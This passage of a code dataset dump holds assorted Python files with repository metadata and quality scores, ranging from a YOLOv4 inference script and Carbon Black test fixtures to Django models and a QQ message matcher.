kmcsim/sim/events_old.py | vlcekl/kmcpy | 0 | 5050 | #!//anaconda/envs/py36/bin/python
#
# File name: kmc_pld.py
# Date: 2018/08/03 09:07
# Author: <NAME>
#
# Description:
#
import numpy as np
from collections import Counter
class EventTree:
"""
Class maintaining a binary tree for random event type lookup
and arrays for choosing specific event.
"""
def __init__(self, rates, events):
self.rates = rates
self.events = events
self.__setup()
def __build_tree(self, e_ratio):
self.event_tree = []
# create event ratio array level 0 - bottom
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
# create the bottom level (rates*numbers)
self.event_tree.append(np.array(e_ratio))
# create partial summs (iteratively) up to the 2nd highest level
while len(e_ratio) > 2:
e_ratio = [e_ratio[i]+e_ratio[i+1] for i in range(0, len(e_ratio), 2)]
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
self.event_tree.append(np.array(e_ratio))
# create top level = sum of all rates
self.event_tree.append(np.array(sum(e_ratio)))
def __setup(self):
# Get dictionary of event type counts
e_counts = Counter([e['type'] for e in self.events])
print(e_counts)
# create a list of events based on event types
self.event_counts = [[] for _ in range(len(self.rates))]
for e in self.events:
self.event_counts[e['type']].append(e)
e_ratio = [e_counts.get(t, 0)*r for t, r in enumerate(self.rates)]
print('e_ratio', e_ratio)
self.__build_tree(e_ratio)
def update_events(self, old_events, new_events):
"""
Update tree: remove old events and add new events
"""
pass
def find_event(self):
"""Find and return an event"""
# generate a random number [0,Rs)
q = self.Rs*np.random.random()
# cycle through levels (top->down)
# start with top-level child (k-2) end with level above bottom (1)
j = 0
for k in range(len(self.event_tree)-2, 0, -1):
# left child value
left = self.event_tree[k][j]
if q < left:
j = 2*j
else:
q -= left
j = 2*j + 1
# bottom level - return selected event type
if q < self.event_tree[0][j]:
event_type = self.events[j]
else:
event_type = self.events[j+1]
# select a random event index of a given type
event_number = np.random.randint(len(self.event_counts[event_type]))
# get the event object
event = event_counts[event_type][event_number]
return event
| 2.875 | 3 |
env/lib/python3.6/site-packages/odf/meta.py | anthowen/duplify | 5,079 | 5051 | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 <NAME>, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from odf.namespaces import METANS
from odf.element import Element
# Autogenerated
def AutoReload(**args):
return Element(qname = (METANS,'auto-reload'), **args)
def CreationDate(**args):
return Element(qname = (METANS,'creation-date'), **args)
def DateString(**args):
return Element(qname = (METANS,'date-string'), **args)
def DocumentStatistic(**args):
return Element(qname = (METANS,'document-statistic'), **args)
def EditingCycles(**args):
return Element(qname = (METANS,'editing-cycles'), **args)
def EditingDuration(**args):
return Element(qname = (METANS,'editing-duration'), **args)
def Generator(**args):
return Element(qname = (METANS,'generator'), **args)
def HyperlinkBehaviour(**args):
return Element(qname = (METANS,'hyperlink-behaviour'), **args)
def InitialCreator(**args):
return Element(qname = (METANS,'initial-creator'), **args)
def Keyword(**args):
return Element(qname = (METANS,'keyword'), **args)
def PrintDate(**args):
return Element(qname = (METANS,'print-date'), **args)
def PrintedBy(**args):
return Element(qname = (METANS,'printed-by'), **args)
def Template(**args):
args.setdefault('type', 'simple')
return Element(qname = (METANS,'template'), **args)
def UserDefined(**args):
return Element(qname = (METANS,'user-defined'), **args)
| 1.929688 | 2 |
scripts/my_inference.py | Mr-TalhaIlyas/Scaled-YOLOv4 | 0 | 5052 | import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import torch
torch.rand(10)
import torch.nn as nn
import torch.nn.functional as F
import glob
from tqdm import tqdm, trange
print(torch.cuda.is_available())
print(torch.cuda.get_device_name())
print(torch.cuda.current_device())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
#Additional Info when using cuda
if device.type == 'cuda':
print(torch.cuda.get_device_name(0))
print('Memory Usage:')
print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
import torch.backends.cudnn as cudnn
import numpy as np
import os, cv2
from tqdm import tqdm, trange
import seaborn as sns
from models.experimental import attempt_load
from utils.datasets import LoadStreams, LoadImages
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer)
from utils.torch_utils import select_device, load_classifier, time_synchronized
from my_utils import xyxy_2_xyxyo, draw_boxes
# Initialize
device = select_device('')
half = device.type != 'cpu' # half precision only supported on CUDA
def prepare_input(img1, img_size=416, half=True):
img2 = cv2.resize(img1, (img_size, img_size)) # W x H
img2 = img2.transpose(2,0,1)
img2 = img2[np.newaxis, ...]
img2 = torch.from_numpy(img2).to(device) # torch image is ch x H x W
img2 = img2.half() if not half else img2.float()
img2 /= 255.0
return img2
#%%
# Directories
out = '/home/user01/data_ssd/Talha/yolo/op/'
weights = '/home/user01/data_ssd/Talha/yolo/ScaledYOLOv4/runs/exp2_yolov4-csp-results/weights/best_yolov4-csp-results.pt'
source = '/home/user01/data_ssd/Talha/yolo/paprika_y5/valid/images/'
imgsz = 416
conf_thres = 0.4
iou_thres = 0.5
classes = [0,1,2,3,4,5]
class_names = ["blossom_end_rot", "graymold","powdery_mildew","spider_mite",
"spotting_disease", "snails_and_slugs"]
# deleting files in op_dir
filelist = [ f for f in os.listdir(out)]# if f.endswith(".png") ]
for f in tqdm(filelist, desc = 'Deleting old files fro directory'):
os.remove(os.path.join(out, f))
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
if half:
model.half() # to FP16
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
# Run inference
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
#%%
for i in trange(len(img_paths)):
path = img_paths[i]
img1 = cv2.imread(path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
# get file name
name = os.path.basename(path)[:-4]
# Inference
t1 = time_synchronized()
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
if pred[0] is not None:
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
else:
boxes = np.array([10.0, 20.0, 30.0, 50.0, 0.75, 0]).reshape(1,6) # dummy values
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
all_bounding_boxnind = []
for i in range(boxes.shape[0]):
bounding_box = [0.0] * 6
bounding_box[0] = det_classes[i]
bounding_box[1] = confd[i]
bounding_box[2] = coords_xyminmax[i][0]
bounding_box[3] = coords_xyminmax[i][1]
bounding_box[4] = coords_xyminmax[i][2]
bounding_box[5] = coords_xyminmax[i][3]
bounding_box = str(bounding_box)[1:-1]# remove square brackets
bounding_box = bounding_box.replace("'",'')# removing inverted commas around class name
bounding_box = "".join(bounding_box.split())# remove spaces in between **here dont give space inbetween the inverted commas "".
all_bounding_boxnind.append(bounding_box)
all_bounding_boxnind = ' '.join(map(str, all_bounding_boxnind))# convert list to string
all_bounding_boxnind=list(all_bounding_boxnind.split(' ')) # convert strin to list
# replacing commas with spaces
for i in range(len(all_bounding_boxnind)):
all_bounding_boxnind[i] = all_bounding_boxnind[i].replace(',',' ')
for i in range(len(all_bounding_boxnind)):
# check if file exiscts else make new
with open(out +'{}.txt'.format(name), "a+") as file_object:
# Move read cursor to the start of file.
file_object.seek(0)
# If file is not empty then append '\n'
data = file_object.read(100)
if len(data) > 0 :
file_object.write("\n")
# Append text at the end of file
file_object.write(all_bounding_boxnind[i])
#%%
import glob, random
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 300
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
img_path = random.choice(img_paths)
img1 = cv2.imread(img_path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
t = np.asarray(coords_xyminmax)
op = draw_boxes(img1, confd, t, det_classes, class_names, order='xy_minmax', analysis=False)
plt.imshow(op)
print('='*50)
print('Image Name: ', os.path.basename(img_path),img1.shape)
print('\nClass_name ', '| B_box Coords ', '| Confidence')
print('_'*50)
for k in range(len(det_classes)):
print(det_classes[k], t[k], confd[k])
print('='*50) | 2.140625 | 2 |
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py | fslds/carbon-black-cloud-sdk-python | 24 | 5053 | <reponame>fslds/carbon-black-cloud-sdk-python<filename>src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py<gh_stars>10-100
"""Mock responses for recommendations."""
SEARCH_REQ = {
"criteria": {
"policy_type": ['reputation_override'],
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"hashes": ['111', '222']
},
"rows": 50,
"sort": [
{
"field": "impact_score",
"order": "DESC"
}
]
}
SEARCH_RESP = {
"results": [
{
"recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede",
"filename": "XprotectService",
"application": {
"type": "EXE",
"value": "FOO"
}
},
"workflow": {
"status": "NEW",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:39.000Z",
"comment": "Ours is the fury"
},
"impact": {
"org_adoption": "LOW",
"impacted_devices": 45,
"event_count": 76,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0",
"filename": "sophos ui.msi"
},
"workflow": {
"status": "NEW",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T20:53:09.000Z",
"comment": "Always pay your debts"
},
"impact": {
"org_adoption": "HIGH",
"impacted_devices": 8,
"event_count": 25,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
},
{
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
],
"num_found": 3
}
ACTION_INIT = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "NEW",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
ACTION_REQS = [
{
"action": "ACCEPT",
"comment": "Alpha"
},
{
"action": "RESET"
},
{
"action": "REJECT",
"comment": "Charlie"
},
]
ACTION_REFRESH_SEARCH = {
"criteria": {
"status": ['NEW', 'REJECTED', 'ACCEPTED'],
"policy_type": ['reputation_override']
},
"rows": 50
}
ACTION_SEARCH_RESP = {
"results": [ACTION_INIT],
"num_found": 1
}
ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED']
ACTION_INIT_ACCEPTED = {
"recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68",
"rule_type": "reputation_override",
"policy_id": 0,
"new_rule": {
"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 192.168.3.11 (x86).msi"
},
"workflow": {
"status": "ACCEPTED",
"ref_id": "e9410b754ea011ebbfd0db2585a41b07",
"changed_by": "<EMAIL>",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
| 1.5625 | 2 |
monasca/microservice/notification_engine.py | TeamZenith/python-monasca | 0 | 5054 | # Copyright 2015 Carnegie Mellon University
#
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import json
from oslo.config import cfg
from stevedore import driver
from monasca.common import es_conn
from monasca.common import email_sender
from monasca.common import kafka_conn
from monasca.openstack.common import log
from monasca.openstack.common import service as os_service
es_opts = [
cfg.StrOpt('topic',
default='alarm',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('topic2',
default='notification_methods',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('doc_type',
default='',
help=('The document type which defines what document '
'type the messages will be save into. If not '
'specified, then the topic will be used.')),
cfg.StrOpt('processor',
default='',
help=('The message processer to load to process the message.'
'If the message does not need to be process anyway,'
'leave the default')),
]
es_group = cfg.OptGroup(name='notification', title='notification')
cfg.CONF.register_group(es_group)
cfg.CONF.register_opts(es_opts, es_group)
LOG = log.getLogger(__name__)
class NotificationEngine(os_service.Service):
def __init__(self, threads=1000):
super(NotificationEngine, self).__init__(threads)
self._kafka_conn = kafka_conn.KafkaConnection(
cfg.CONF.notification.topic)
# Use doc_type if it is defined.
if cfg.CONF.notification.doc_type:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.doc_type)
else:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.topic2)
def handle_alarm_msg(self, msg):
if msg and msg.message:
LOG.debug("Message received for alarm: " + msg.message.value)
value = msg.message.value
if value:
# value's format is:
# {
# "metrics": {
# "timestamp": 1432672915.409,
# "name": "biz",
# "value": 1500,
# "dimensions": {
# "key2": "value2",
# "key1": "value1"
# }
# },
# "state_updated_timestamp": 1432672915,
# "state": "ALARM",
# "alarm-definition": {
# "alarm_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "undetermined_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "name": "Average CPU percent greater than 10",
# "match_by": [
# "hostname"
# ],
# "description": "The average CPU percent is greater than 10",
# "ok_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "expression": "max(foo{hostname=mini-mon,mu=na}, 120) > 1100
# and max(bar { asd = asd} )>1200 or avg(biz)>1300",
# "id": "c60ec47e-5038-4bf1-9f95-4046c6e91111",
# "severity": "LOW"
# }
# }
# convert to dict, and get state to determine the actions(notification method id) needed.
# the method id can be used to match the notification method in elasticSearch
# Then an email will be sent (TODO: phone txt msg are not dealt with for now)
dict_msg = ast.literal_eval(value)
state = dict_msg["state"]
if state not in ["ALARM","OK","UNDETERMINED"]:
LOG.error("state of alarm is not defined as expected")
return
actions = []
if state == 'ALARM':
actions = dict_msg["alarm-definition"]["alarm_actions"]
if state == 'OK':
actions = dict_msg["alarm-definition"]["ok_actions"]
if state == 'UNDETERMINED':
actions = dict_msg["alarm-definition"]["undetermined_actions"]
addresses = []
types = []
# the action_id is an id of notification method
# there can be multiple ids in one alarm message with different types
for action_id in actions:
es_res = self._es_conn.get_message_by_id(action_id)
def _get_notification_method_response(res):
if res and res.status_code == 200:
obj = res.json()
if obj:
return obj.get('hits')
return None
else:
return None
es_res = _get_notification_method_response(es_res)
LOG.debug('Query to ElasticSearch returned: %s' % es_res)
if es_res is None:
LOG.error("The provided is not defined as expected")
return
name = es_res["hits"][0]["_source"]["name"]
type = es_res["hits"][0]["_source"]["type"]
address = es_res["hits"][0]["_source"]["address"]
types.append(type)
addresses.append(address)
email_addresses = []
for i in range(len(types)):
if types[i] == "EMAIL":
email_addresses.append(addresses[i])
email_sender.send_emails(email_addresses, "Alarm to User", dict_msg["alarm-definition"]["description"])
def start(self):
while True:
try:
for msg in self._kafka_conn.get_messages():
self.handle_alarm_msg(msg)
# if autocommit is set, this will be a no-op call.
self._kafka_conn.commit()
except Exception:
LOG.exception('Error occurred while handling kafka messages.')
def stop(self):
self._kafka_conn.close()
super(NotificationEngine, self).stop()
| 1.789063 | 2 |
dhf_wrapper/base_client.py | Enflow-io/dhf-pay-python | 0 | 5055 | <gh_stars>0
from typing import Optional, Callable
import requests
from requests.auth import AuthBase
from requests.exceptions import RequestException
class BearerAuth(AuthBase):
def __init__(self, token):
self.token = token
def __call__(self, r):
r.headers['Authorization'] = f'Bearer {self.token}'
return r
class ServiceClient:
DEFAULT_MAX_RETRIES = 0
def __init__(
self,
base_url: str,
token: Optional[str] = None,
):
self.base_url = base_url.rstrip("/")
self.token = token
self.session = self._create_client_session()
def _dispose(self):
"""
Class method to close user session
"""
self.session.close()
def _create_client_session(self):
"""
Class method to create client session
"""
session = requests.Session()
session.auth = self._get_http_auth()
return session
def _get_http_auth(self):
"""
Class method to resolve http authentication
"""
if self.token:
return BearerAuth(self.token)
def make_full_url(self, path: str) -> str:
"""
Class method to make full url
:param path: str
:return: str
"""
return f"{self.base_url}{path}"
def _make_request(self, request: Callable, retries=DEFAULT_MAX_RETRIES, **kwargs) -> dict:
"""
Class method to make request
:param request: Callable
:return: dict
"""
try:
with request(**kwargs) as resp:
resp.raise_for_status()
return resp.json()
except RequestException as e:
if retries > 0 and e.request.status >= 500:
return self._make_request(request=request, retries=retries - 1, **kwargs)
else:
raise e
| 2.921875 | 3 |
flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | 165 | 5056 | <gh_stars>100-1000
import os
import shutil
from .ZipFileManager import ZipFileManager
from .DiskFileManager import DiskFileManager
from .Directory import Directory
import string
printable = set(string.printable) - set("\x0b\x0c")
def is_hex(s):
return any(c not in printable for c in s)
def file_tree(target, replace=False):
"""Open a connection to a file tree which can be either a disk folder, a
zip archive, or an in-memory zip archive.
Parameters
----------
target
Either the path to a target folder, or a zip file, or '@memory' to write
a zip file in memory (at which case a string of the zip file is returned)
If the target is already a flametree directory, it is returned as-is.
replace
If True, will remove the target if it already exists. If False, new files
will be written inside the target and some files may be overwritten.
"""
if isinstance(target, Directory):
return target
if (not isinstance(target, str)) or is_hex(target):
return Directory(file_manager=ZipFileManager(source=target))
elif target == "@memory":
return Directory("@memory", file_manager=ZipFileManager("@memory"))
elif target.lower().endswith(".zip"):
return Directory(target, file_manager=ZipFileManager(target, replace=replace))
else:
return Directory(target, file_manager=DiskFileManager(target))
| 3.390625 | 3 |
audio/audio_client.py | artigianitecnologici/marrtino_apps | 0 | 5057 | <reponame>artigianitecnologici/marrtino_apps
import sys
import socket
import time
ip = '127.0.0.1'
port = 9001
if (len(sys.argv)>1):
ip = sys.argv[1]
if (len(sys.argv)>2):
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip,port))
sock.send('bip\n\r')
data = sock.recv(80)
print data
sock.send('TTS[it-IT] ciao, come stai?\n\r')
data = sock.recv(80)
print data
sock.send('TTS[en-US] very well, thank you!\n\r')
data = sock.recv(80)
print data
sock.send('TTS default language is english!\n\r')
data = sock.recv(80)
print data
sock.send('bop\n\r')
data = sock.recv(80)
print data
time.sleep(1)
sock.close()
| 2.5 | 2 |
qmotor/message/matcher.py | yulinfeng000/qmotor | 0 | 5058 | <filename>qmotor/message/matcher.py
from abc import ABC, abstractmethod
from typing import List
from .common import (
AtCell,
BasicMessage,
GroupMessage,
FriendMessage,
MsgCellType,
MessageType,
PlainCell,
)
from ..utils import is_str_blank, str_contains
class MsgMatcher(ABC):
def msg_chain_from_ctx(self, ctx):
return BasicMessage(ctx.msg).messageChain()
def get_cell_type(self, msg_cell):
return msg_cell.get("type", None)
@abstractmethod
def match(self, ctx) -> bool:
pass
class GroupMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.GroupMessage
class FriendMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.FriendMessage
class TempMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.TempMessage
class AtMsg(GroupMsg):
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
return self.get_cell_type(msg_chain[1]) == MsgCellType.At
class AtMeMsg(AtMsg):
me_qq: int
def __init__(self, me_qq) -> None:
super(AtMeMsg, self).__init__()
self.me_qq = me_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = GroupMessage(ctx.msg).messageChain()
at = AtCell(msg_chain[1])
return self.me_qq == at.target()
class JustAtMeMsg(AtMeMsg):
def __init__(self, me_qq) -> None:
super(JustAtMeMsg, self).__init__(me_qq)
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
plain = PlainCell(msg_chain[2])
return is_str_blank(plain.text())
class AtMeCmdMsg(AtMeMsg):
cmd_list: List[str]
def __init__(self, me_qq, cmd) -> None:
super(AtMeCmdMsg, self).__init__(me_qq)
self.cmd_list = cmd
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
return str_contains(PlainCell(msg_chain[2]).text(), self.cmd_list)
class SpecificFriendMsg(FriendMsg):
friend_qq: int
def __init__(self, friend_qq) -> None:
super(SpecificFriendMsg, self).__init__()
self.friend_qq = friend_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
return self.friend_qq == FriendMessage(ctx.msg).friend_qq()
class SpecificGroupMsg(GroupMsg):
group_qq: int
def __init__(self, group_qq) -> None:
super(SpecificGroupMsg, self).__init__()
self.group_qq = group_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
return self.group_qq == GroupMessage(ctx.msg).group_qq()
if __name__ == "__main__":
msg_matcher = JustAtMeMsg(123)
class Ctx:
def __init__(self, msg) -> None:
self.msg = msg
msg = {
"type": "GroupMessage",
"sender": {"id": 123, "nickname": "", "remark": ""},
"messageChain": [
{"type": "Source", "id": 123456, "time": 123456},
{"type": "At", "target": 1234, "display": "@Mirai"},
{"type": "Plain", "text": " "},
],
}
print(msg_matcher.match(Ctx(msg)))
| 2.421875 | 2 |
invert-binary-tree/invert-binary-tree.py | Atri10/Leet-code---Atri_Patel | 1 | 5059 | class Solution:
def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:
if root:
root.left,root.right = self.invertTree(root.right),self.invertTree(root.left)
return root
return None | 3.515625 | 4 |
main/admin.py | sinahmr/childf | 0 | 5060 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as DjangoUserAdmin
from django.contrib.auth.models import Group
from django.utils.translation import ugettext_lazy as _
from main.models import UserInfo, User, Child, Volunteer, Donor, Letter, Need, PurchaseForInstitute, PurchaseForNeed, \
Activity, OngoingUserInfo
@admin.register(User)
class UserAdmin(DjangoUserAdmin):
class UserInfoInline(admin.TabularInline):
model = UserInfo
extra = 1
max_num = 1
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', '<PASSWORD>', '<PASSWORD>'),
}),
)
list_display = ('email', 'userinfo', 'is_staff')
search_fields = ('email', 'userinfo__first_name', 'userinfo__last_name')
ordering = ('email',)
inlines = [UserInfoInline]
admin.site.unregister(Group)
admin.site.register(Child)
admin.site.register(Volunteer)
admin.site.register(Donor)
admin.site.register(Letter)
admin.site.register(Need)
admin.site.register(PurchaseForInstitute)
admin.site.register(PurchaseForNeed)
admin.site.register(Activity)
admin.site.register(OngoingUserInfo)
| 1.9375 | 2 |
hunting/display/render.py | MoyTW/RL_Arena_Experiment | 0 | 5061 | import tdl
import time
import hunting.constants as c
class Renderer:
def __init__(self, main_console=None, level_display_width=c.SCREEN_WIDTH, level_display_height=c.SCREEN_HEIGHT):
if main_console is None:
self.main_console = tdl.init(level_display_width, level_display_height, 'From Renderer Default Constructor')
else:
self.main_console = main_console
self.level_display_width = level_display_width
self.level_display_height = level_display_height
self._level_console = tdl.Console(level_display_width, level_display_height)
def _render_level(self, con, level):
for x in range(level.width):
for y in range(level.height):
if level[x][y].blocks is not False:
self._level_console.draw_rect(x, y, 1, 1, None, bg=[120, 0, 50])
else:
self._level_console.draw_rect(x, y, 1, 1, None, bg=[30, 255, 30])
# TODO: This is pretty hacky!
i = 1
for o in level._all_objects:
if o.faction == '1': # TODO: Better faction implementation!
color = [255, 0, 0]
else:
color = [0, 0, 255]
self._level_console.draw_char(o.x, o.y, i, color)
i += 1
con.blit(self._level_console)
def render_all(self, level):
self._render_level(self.main_console, level)
tdl.flush()
def clear(self, level):
for o in level._all_objects:
self._level_console.draw_char(o.x, o.y, ' ')
def render_event(self, level, event):
if event[c.EVENT_TYPE] == c.MOVEMENT_EVENT:
# Clear previous location
self._level_console.draw_char(event[c.MOVEMENT_PREV_X], event[c.MOVEMENT_PREV_Y], ' ', bg=[0, 15, 7])
# Retrieve faction and color
o = level.get_object_by_id(event[c.OBJ_ID])
if o.faction == '1': # TODO: Better faction implementation!
color = [255, 0, 0]
else:
color = [0, 0, 255]
self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], o.faction, fg=color)
elif event[c.EVENT_TYPE] == c.OBJECT_DESTRUCTION_EVENT:
self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], ' ', bg=[0, 15, 7])
# Render
self.main_console.blit(self._level_console)
tdl.flush()
def visualize(level, show_time=1):
Renderer().render_all(level)
time.sleep(show_time) | 2.484375 | 2 |
ideas/models.py | neosergio/hackatrix-api | 1 | 5062 | <gh_stars>1-10
from django.db import models
class Idea(models.Model):
title = models.CharField(max_length=255, unique=True)
description = models.TextField()
author = models.OneToOneField('events.Registrant',
related_name='author_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
written_by = models.ForeignKey('users.User',
related_name='written_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
event = models.ForeignKey('events.Event',
related_name='event_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
is_valid = models.BooleanField(default=False)
max_number_of_participants = models.PositiveIntegerField(default=7)
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
is_active = models.BooleanField(default=True)
class Meta():
